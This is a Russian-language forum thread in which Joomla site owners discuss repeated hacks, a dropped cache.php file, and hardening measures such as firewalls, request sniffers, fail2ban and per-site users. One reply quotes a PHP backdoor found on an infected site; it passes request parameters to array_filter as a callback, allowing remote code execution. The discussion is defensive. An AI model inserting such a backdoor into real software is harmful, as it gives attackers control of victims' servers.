Как понять в чем уязвимость сайта? - Безопасность сайтов на Joomla

Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.

Кто-то может подсказать в чем уязвимость?

Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите

Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?

Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?

Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.

Сначала почистите сайт,

Это сделал.

наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.

Это что такое, расширение какое-то? Первый раз слышу.

Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/

А где ж версии и что стоит?

Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/

Круто!

Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!

Версия Joomla какая? Когда была обновлена?

Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!

Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!

Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.

Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.

Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.

Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.

Ну вы их хоть разделили? Чтобы опять такого не было.

 

Ну вы их хоть разделили? Чтобы опять такого не было.

Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке

Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке

Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.